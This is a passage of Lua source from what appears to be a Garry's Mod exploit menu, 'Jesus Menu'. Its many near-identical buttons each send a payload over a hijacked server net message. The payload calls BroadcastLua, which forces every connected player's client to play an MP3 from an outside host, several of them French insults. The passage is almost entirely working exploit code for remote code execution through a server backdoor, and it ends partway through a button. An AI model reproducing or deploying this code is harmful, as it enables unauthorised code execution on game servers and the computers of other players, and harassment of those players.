  3141. surface.SetDrawColor(29, 39, 55)
  3142. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3143. surface.SetDrawColor( 32, 80, 154 )
  3144. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3145. end
  3146. Macro.DoClick = function()
  3147. net.Start(netKey)
  3148. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/Anglais.mp3\", \"mono\", function()end )]])")
  3149. net.WriteBit (1)
  3150. net.SendToServer()
  3151. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard - Anglais" )
  3152. SploitNotify("Soundboard - Anglais")
  3153. surface.PlaySound("buttons/blip1.wav")
  3154. end
  3155.  
  3156. local Macro = vgui.Create( "DButton" )
  3157. Macro:SetParent(Targets)
  3158. Macro:SetPos( 260, 270 )
  3159. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3160. Macro:SetSize( 110, 25 )
  3161. Macro:SetText( "Soundboard - Aujourd'hui jles juré" )
  3162. Macro.Paint = function()
  3163. surface.SetDrawColor(29, 39, 55)
  3164. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3165. surface.SetDrawColor( 32, 80, 154 )
  3166. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3167. end
  3168. Macro.DoClick = function()
  3169. net.Start(netKey)
  3170. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/Aujourd.mp3\", \"mono\", function()end )]])")
  3171. net.WriteBit (1)
  3172. net.SendToServer()
  3173. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard - Aujourd'hui jles juré" )
  3174. SploitNotify("Soundboard - Aujourd'hui jles juré")
  3175. surface.PlaySound("buttons/blip1.wav")
  3176. end
  3177.  
  3178. local Macro = vgui.Create( "DButton" )
  3179. Macro:SetParent(Targets)
  3180. Macro:SetPos( 260, 300 )
  3181. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3182. Macro:SetSize( 110, 25 )
  3183. Macro:SetText( "Soundboard - Et mon compte twitter" )
  3184. Macro.Paint = function()
  3185. surface.SetDrawColor(29, 39, 55)
  3186. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3187. surface.SetDrawColor( 32, 80, 154 )
  3188. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3189. end
  3190. Macro.DoClick = function()
  3191. net.Start(netKey)
  3192. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/Compte%20Twitter.mp3\", \"mono\", function()end )]])")
  3193. net.WriteBit (1)
  3194. net.SendToServer()
  3195. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard - Et mon compte twitter" )
  3196. SploitNotify("Soundboard - Et mon compte twitter")
  3197. surface.PlaySound("buttons/blip1.wav")
  3198. end
  3199.  
  3200. local Macro = vgui.Create( "DButton" )
  3201. Macro:SetParent(Targets)
  3202. Macro:SetPos( 260, 330 )
  3203. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3204. Macro:SetSize( 110, 25 )
  3205. Macro:SetText( "Soundboard - Coup de coude" )
  3206. Macro.Paint = function()
  3207. surface.SetDrawColor(29, 39, 55)
  3208. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3209. surface.SetDrawColor( 32, 80, 154 )
  3210. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3211. end
  3212. Macro.DoClick = function()
  3213. net.Start(netKey)
  3214. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/Coup%20De%20Coude.mp3\", \"mono\", function()end )]])")
  3215. net.WriteBit (1)
  3216. net.SendToServer()
  3217. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard - Coup de coude" )
  3218. SploitNotify("Soundboard - Coup de coude")
  3219. surface.PlaySound("buttons/blip1.wav")
  3220. end
  3221.  
  3222. local Macro = vgui.Create( "DButton" )
  3223. Macro:SetParent(Targets)
  3224. Macro:SetPos( 260, 360 )
  3225. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3226. Macro:SetSize( 110, 25 )
  3227. Macro:SetText( "Soundboard - Coup de coude" )
  3228. Macro.Paint = function()
  3229. surface.SetDrawColor(29, 39, 55)
  3230. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3231. surface.SetDrawColor( 32, 80, 154 )
  3232. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3233. end
  3234. Macro.DoClick = function()
  3235. net.Start(netKey)
  3236. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/Coup%20De%20Coude.mp3\", \"mono\", function()end )]])")
  3237. net.WriteBit (1)
  3238. net.SendToServer()
  3239. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard - Coup de coude" )
  3240. SploitNotify("Soundboard - Coup de coude")
  3241. surface.PlaySound("buttons/blip1.wav")
  3242. end
  3243.  
  3244. local Macro = vgui.Create( "DButton" )
  3245. Macro:SetParent(Targets)
  3246. Macro:SetPos( 260, 390 )
  3247. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3248. Macro:SetSize( 110, 25 )
  3249. Macro:SetText( "Soundboard - Dino" )
  3250. Macro.Paint = function()
  3251. surface.SetDrawColor(29, 39, 55)
  3252. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3253. surface.SetDrawColor( 32, 80, 154 )
  3254. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3255. end
  3256. Macro.DoClick = function()
  3257. net.Start(netKey)
  3258. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/Dinosaure.mp3\", \"mono\", function()end )]])")
  3259. net.WriteBit (1)
  3260. net.SendToServer()
  3261. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard - Dino" )
  3262. SploitNotify("Soundboard - Dino")
  3263. surface.PlaySound("buttons/blip1.wav")
  3264. end
  3265.  
  3266. local Macro = vgui.Create( "DButton" )
  3267. Macro:SetParent(Targets)
  3268. Macro:SetPos( 260, 420 )
  3269. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3270. Macro:SetSize( 110, 25 )
  3271. Macro:SetText( "Soundboard - FDP1" )
  3272. Macro.Paint = function()
  3273. surface.SetDrawColor(29, 39, 55)
  3274. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3275. surface.SetDrawColor( 32, 80, 154 )
  3276. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3277. end
  3278. Macro.DoClick = function()
  3279. net.Start(netKey)
  3280. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/Fils%20De%20Pute%20%231.mp3\", \"mono\", function()end )]])")
  3281. net.WriteBit (1)
  3282. net.SendToServer()
  3283. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard - FDP1" )
  3284. SploitNotify("Soundboard - FDP1")
  3285. surface.PlaySound("buttons/blip1.wav")
  3286. end
  3287.  
  3288. local Macro = vgui.Create( "DButton" )
  3289. Macro:SetParent(Targets)
  3290. Macro:SetPos( 260, 450 )
  3291. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3292. Macro:SetSize( 110, 25 )
  3293. Macro:SetText( "Soundboard - FDP2" )
  3294. Macro.Paint = function()
  3295. surface.SetDrawColor(29, 39, 55)
  3296. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3297. surface.SetDrawColor( 32, 80, 154 )
  3298. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3299. end
  3300. Macro.DoClick = function()
  3301. net.Start(netKey)
  3302. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/Fils%20De%20Pute%20%232.mp3\", \"mono\", function()end )]])")
  3303. net.WriteBit (1)
  3304. net.SendToServer()
  3305. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard - FDP2" )
  3306. SploitNotify("Soundboard - FDP2")
  3307. surface.PlaySound("buttons/blip1.wav")
  3308. end
  3309.  
  3310. local Macro = vgui.Create( "DButton" )
  3311. Macro:SetParent(Targets)
  3312. Macro:SetPos( 260, 480 )
  3313. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3314. Macro:SetSize( 110, 25 )
  3315. Macro:SetText( "Soundboard - Je pensais pas ça de toi" )
  3316. Macro.Paint = function()
  3317. surface.SetDrawColor(29, 39, 55)
  3318. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3319. surface.SetDrawColor( 32, 80, 154 )
  3320. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3321. end
  3322. Macro.DoClick = function()
  3323. net.Start(netKey)
  3324. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/Je%20Pensais%20Pas%20%C3%A7a%20De%20Toi.mp3\", \"mono\", function()end )]])")
  3325. net.WriteBit (1)
  3326. net.SendToServer()
  3327. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard - Je pensais pas ça de toi" )
  3328. SploitNotify("Soundboard - Je pensais pas ça de toi")
  3329. surface.PlaySound("buttons/blip1.wav")
  3330. end
  3331.  
  3332. local Macro = vgui.Create( "DButton" )
  3333. Macro:SetParent(Targets)
  3334. Macro:SetPos( 260, 510 )
  3335. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3336. Macro:SetSize( 110, 25 )
  3337. Macro:SetText( "Soundboard - PS4" )
  3338. Macro.Paint = function()
  3339. surface.SetDrawColor(29, 39, 55)
  3340. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3341. surface.SetDrawColor( 32, 80, 154 )
  3342. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3343. end
  3344. Macro.DoClick = function()
  3345. net.Start(netKey)
  3346. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/La%20Ps4.mp3\", \"mono\", function()end )]])")
  3347. net.WriteBit (1)
  3348. net.SendToServer()
  3349. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard - PS4" )
  3350. SploitNotify("Soundboard - PS4")
  3351. surface.PlaySound("buttons/blip1.wav")
  3352. end
  3353.  
  3354. local Macro = vgui.Create( "DButton" )
  3355. Macro:SetParent(Targets)
  3356. Macro:SetPos( 260, 540 )
  3357. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3358. Macro:SetSize( 110, 25 )
  3359. Macro:SetText( "Soundboard - Grand père moustafa" )
  3360. Macro.Paint = function()
  3361. surface.SetDrawColor(29, 39, 55)
  3362. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3363. surface.SetDrawColor( 32, 80, 154 )
  3364. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3365. end
  3366. Macro.DoClick = function()
  3367. net.Start(netKey)
  3368. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/Le%20Grand%20P%C3%A8re.mp3\", \"mono\", function()end )]])")
  3369. net.WriteBit (1)
  3370. net.SendToServer()
  3371. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard - Grand père moustafa" )
  3372. SploitNotify("Soundboard - Grand père moustafa")
  3373. surface.PlaySound("buttons/blip1.wav")
  3374. end
  3375.  
  3376. local Macro = vgui.Create( "DButton" )
  3377. Macro:SetParent(Targets)
  3378. Macro:SetPos( 260, 570 )
  3379. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3380. Macro:SetSize( 110, 25 )
  3381. Macro:SetText( "Soundboard - FDP MA LUMIERE" )
  3382. Macro.Paint = function()
  3383. surface.SetDrawColor(29, 39, 55)
  3384. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3385. surface.SetDrawColor( 32, 80, 154 )
  3386. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3387. end
  3388. Macro.DoClick = function()
  3389. net.Start(netKey)
  3390. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/Ma%20Lumi%C3%A8re.mp3\", \"mono\", function()end )]])")
  3391. net.WriteBit (1)
  3392. net.SendToServer()
  3393. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard - FDP MA LUMIERE" )
  3394. SploitNotify("Soundboard - FDP MA LUMIERE")
  3395. surface.PlaySound("buttons/blip1.wav")
  3396. end
  3397.  
  3398. local Macro = vgui.Create( "DButton" )
  3399. Macro:SetParent(Targets)
  3400. Macro:SetPos( 260, 600 )
  3401. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3402. Macro:SetSize( 110, 25 )
  3403. Macro:SetText( "Soundboard - Ouvre ta gueule" )
  3404. Macro.Paint = function()
  3405. surface.SetDrawColor(29, 39, 55)
  3406. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3407. surface.SetDrawColor( 32, 80, 154 )
  3408. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3409. end
  3410. Macro.DoClick = function()
  3411. net.Start(netKey)
  3412. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/Ouvre%20Ta%20Gueule.mp3\", \"mono\", function()end )]])")
  3413. net.WriteBit (1)
  3414. net.SendToServer()
  3415. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard - Ouvre ta gueule" )
  3416. SploitNotify("Soundboard - Ouvre ta gueule")
  3417. surface.PlaySound("buttons/blip1.wav")
  3418. end
  3419.  
  3420. local Macro = vgui.Create( "DButton" )
  3421. Macro:SetParent(Targets)
  3422. Macro:SetPos( 260, 630 )
  3423. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3424. Macro:SetSize( 110, 25 )
  3425. Macro:SetText( "Soundboard - PSG" )
  3426. Macro.Paint = function()
  3427. surface.SetDrawColor(29, 39, 55)
  3428. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3429. surface.SetDrawColor( 32, 80, 154 )
  3430. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3431. end
  3432. Macro.DoClick = function()
  3433. net.Start(netKey)
  3434. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/PSG%20les%20Kheys.mp3\", \"mono\", function()end )]])")
  3435. net.WriteBit (1)
  3436. net.SendToServer()
  3437. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard" )
  3438. SploitNotify("Soundboard")
  3439. surface.PlaySound("buttons/blip1.wav")
  3440. end
  3441.  
  3442. local Macro = vgui.Create( "DButton" )
  3443. Macro:SetParent(Targets)
  3444. Macro:SetPos( 260, 660 )
  3445. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3446. Macro:SetSize( 110, 25 )
  3447. Macro:SetText( "Soundboard - Rachide" )
  3448. Macro.Paint = function()
  3449. surface.SetDrawColor(29, 39, 55)
  3450. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3451. surface.SetDrawColor( 32, 80, 154 )
  3452. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3453. end
  3454. Macro.DoClick = function()
  3455. net.Start(netKey)
  3456. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/Rachide.mp3\", \"mono\", function()end )]])")
  3457. net.WriteBit (1)
  3458. net.SendToServer()
  3459. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard" )
  3460. SploitNotify("Soundboard")
  3461. surface.PlaySound("buttons/blip1.wav")
  3462. end
  3463.  
  3464. local Macro = vgui.Create( "DButton" )
  3465. Macro:SetParent(Targets)
  3466. Macro:SetPos( 260, 690 )
  3467. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3468. Macro:SetSize( 110, 25 )
  3469. Macro:SetText( "Soundboard - RIP LA SOURIS" )
  3470. Macro.Paint = function()
  3471. surface.SetDrawColor(29, 39, 55)
  3472. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3473. surface.SetDrawColor( 32, 80, 154 )
  3474. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3475. end
  3476. Macro.DoClick = function()
  3477. net.Start(netKey)
  3478. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/Rip%20la%20souris.mp3\", \"mono\", function()end )]])")
  3479. net.WriteBit (1)
  3480. net.SendToServer()
  3481. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard" )
  3482. SploitNotify("Soundboard")
  3483. surface.PlaySound("buttons/blip1.wav")
  3484. end
  3485.  
  3486. local Macro = vgui.Create( "DButton" )
  3487. Macro:SetParent(Targets)
  3488. Macro:SetPos( 260, 720 )
  3489. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3490. Macro:SetSize( 110, 25 )
  3491. Macro:SetText( "Soundboard - Rire" )
  3492. Macro.Paint = function()
  3493. surface.SetDrawColor(29, 39, 55)
  3494. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3495. surface.SetDrawColor( 32, 80, 154 )
  3496. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3497. end
  3498. Macro.DoClick = function()
  3499. net.Start(netKey)
  3500. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/Rire.mp3\", \"mono\", function()end )]])")
  3501. net.WriteBit (1)
  3502. net.SendToServer()
  3503. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard" )
  3504. SploitNotify("Soundboard")
  3505. surface.PlaySound("buttons/blip1.wav")
  3506. end
  3507.  
  3508. local Macro = vgui.Create( "DButton" )
  3509. Macro:SetParent(Targets)
  3510. Macro:SetPos( 260, 750 )
  3511. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3512. Macro:SetSize( 110, 25 )
  3513. Macro:SetText( "Soundboard - Starfoullah" )
  3514. Macro.Paint = function()
  3515. surface.SetDrawColor(29, 39, 55)
  3516. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3517. surface.SetDrawColor( 32, 80, 154 )
  3518. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3519. end
  3520. Macro.DoClick = function()
  3521. net.Start(netKey)
  3522. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/STARFOULLAH%20THEKAIRI78!.mp3\", \"mono\", function()end )]])")
  3523. net.WriteBit (1)
  3524. net.SendToServer()
  3525. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard" )
  3526. SploitNotify("Soundboard")
  3527. surface.PlaySound("buttons/blip1.wav")
  3528. end
  3529.  
  3530. local Macro = vgui.Create( "DButton" )
  3531. Macro:SetParent(Targets)
  3532. Macro:SetPos( 260, 780 )
  3533. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3534. Macro:SetSize( 110, 25 )
  3535. Macro:SetText( "Soundboard - Sale batard 1" )
  3536. Macro.Paint = function()
  3537. surface.SetDrawColor(29, 39, 55)
  3538. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3539. surface.SetDrawColor( 32, 80, 154 )
  3540. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3541. end
  3542. Macro.DoClick = function()
  3543. net.Start(netKey)
  3544. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/Sale%20Batard%20(2).mp3\", \"mono\", function()end )]])")
  3545. net.WriteBit (1)
  3546. net.SendToServer()
  3547. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard" )
  3548. SploitNotify("Soundboard")
  3549. surface.PlaySound("buttons/blip1.wav")
  3550. end
  3551.  
  3552. local Macro = vgui.Create( "DButton" )
  3553. Macro:SetParent(Targets)
  3554. Macro:SetPos( 260, 810 )
  3555. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3556. Macro:SetSize( 110, 25 )
  3557. Macro:SetText( "Soundboard - Sale batard 2" )
  3558. Macro.Paint = function()
  3559. surface.SetDrawColor(29, 39, 55)
  3560. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3561. surface.SetDrawColor( 32, 80, 154 )
  3562. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3563. end
  3564. Macro.DoClick = function()
  3565. net.Start(netKey)
  3566. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/Sale%20Batard.mp3\", \"mono\", function()end )]])")
  3567. net.WriteBit (1)
  3568. net.SendToServer()
  3569. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard" )
  3570. SploitNotify("Soundboard")
  3571. surface.PlaySound("buttons/blip1.wav")
  3572. end
  3573.  
  3574. local Macro = vgui.Create( "DButton" )
  3575. Macro:SetParent(Targets)
  3576. Macro:SetPos( 260, 840 )
  3577. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3578. Macro:SetSize( 110, 25 )
  3579. Macro:SetText( "Soundboard - Insulte" )
  3580. Macro.Paint = function()
  3581. surface.SetDrawColor(29, 39, 55)
  3582. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3583. surface.SetDrawColor( 32, 80, 154 )
  3584. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3585. end
  3586. Macro.DoClick = function()
  3587. net.Start(netKey)
  3588. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/THEKAIRI78%20INSULTE.mp3\", \"mono\", function()end )]])")
  3589. net.WriteBit (1)
  3590. net.SendToServer()
  3591. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard" )
  3592. SploitNotify("Soundboard")
  3593. surface.PlaySound("buttons/blip1.wav")
  3594. end
  3595.  
  3596. local Macro = vgui.Create( "DButton" )
  3597. Macro:SetParent(Targets)
  3598. Macro:SetPos( 260, 870 )
  3599. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3600. Macro:SetSize( 110, 25 )
  3601. Macro:SetText( "Soundboard - Ta 28 ans" )
  3602. Macro.Paint = function()
  3603. surface.SetDrawColor(29, 39, 55)
  3604. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3605. surface.SetDrawColor( 32, 80, 154 )
  3606. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3607. end
  3608. Macro.DoClick = function()
  3609. net.Start(netKey)
  3610. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/Ta%2028%20Ans.mp3\", \"mono\", function()end )]])")
  3611. net.WriteBit (1)
  3612. net.SendToServer()
  3613. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard" )
  3614. SploitNotify("Soundboard")
  3615. surface.PlaySound("buttons/blip1.wav")
  3616. end
  3617.  
  3618. local Macro = vgui.Create( "DButton" )
  3619. Macro:SetParent(Targets)
  3620. Macro:SetPos( 260, 900 )
  3621. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3622. Macro:SetSize( 110, 25 )
  3623. Macro:SetText( "Soundboard - pokemon 1" )
  3624. Macro.Paint = function()
  3625. surface.SetDrawColor(29, 39, 55)
  3626. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3627. surface.SetDrawColor( 32, 80, 154 )
  3628. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3629. end
  3630. Macro.DoClick = function()
  3631. net.Start(netKey)
  3632. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/pokemon%20musique.mp3\", \"mono\", function()end )]])")
  3633. net.WriteBit (1)
  3634. net.SendToServer()
  3635. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard" )
  3636. SploitNotify("Soundboard")
  3637. surface.PlaySound("buttons/blip1.wav")
  3638. end
  3639.  
  3640. local Macro = vgui.Create( "DButton" )
  3641. Macro:SetParent(Targets)
  3642. Macro:SetPos( 260, 930 )
  3643. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3644. Macro:SetSize( 110, 25 )
  3645. Macro:SetText( "Soundboard - pokemon 2" )
  3646. Macro.Paint = function()
  3647. surface.SetDrawColor(29, 39, 55)
  3648. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3649. surface.SetDrawColor( 32, 80, 154 )
  3650. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3651. end
  3652. Macro.DoClick = function()
  3653. net.Start(netKey)
  3654. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/pokemon%20musique%202.mp3\", \"mono\", function()end )]])")
  3655. net.WriteBit (1)
  3656. net.SendToServer()
  3657. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard" )
  3658. SploitNotify("Soundboard")
  3659. surface.PlaySound("buttons/blip1.wav")
  3660. end
  3661.  
  3662. local Macro = vgui.Create( "DButton" )
  3663. Macro:SetParent(Targets)
  3664. Macro:SetPos( 260, 960 )
  3665. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3666. Macro:SetSize( 110, 25 )
  3667. Macro:SetText( "Soundboard - rire 2" )
  3668. Macro.Paint = function()
  3669. surface.SetDrawColor(29, 39, 55)
  3670. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3671. surface.SetDrawColor( 32, 80, 154 )
  3672. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3673. end
  3674. Macro.DoClick = function()
  3675. net.Start(netKey)
  3676. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/rire2.mp3\", \"mono\", function()end )]])")
  3677. net.WriteBit (1)
  3678. net.SendToServer()
  3679. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard" )
  3680. SploitNotify("Soundboard")
  3681. surface.PlaySound("buttons/blip1.wav")
  3682. end
  3683.  
  3684. local Macro = vgui.Create( "DButton" )
  3685. Macro:SetParent(Targets)
  3686. Macro:SetPos( 260, 990 )
  3687. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3688. Macro:SetSize( 110, 25 )
  3689. Macro:SetText( "Soundboard - rire 3" )
  3690. Macro.Paint = function()
  3691. surface.SetDrawColor(29, 39, 55)
  3692. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3693. surface.SetDrawColor( 32, 80, 154 )
  3694. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3695. end
  3696. Macro.DoClick = function()
  3697. net.Start(netKey)
  3698. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/rire%203.mp3\", \"mono\", function()end )]])")
  3699. net.WriteBit (1)
  3700. net.SendToServer()
  3701. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard" )
  3702. SploitNotify("Soundboard")
  3703. surface.PlaySound("buttons/blip1.wav")
  3704. end
  3705.  
  3706. local Macro = vgui.Create( "DButton" )
  3707. Macro:SetParent(Targets)
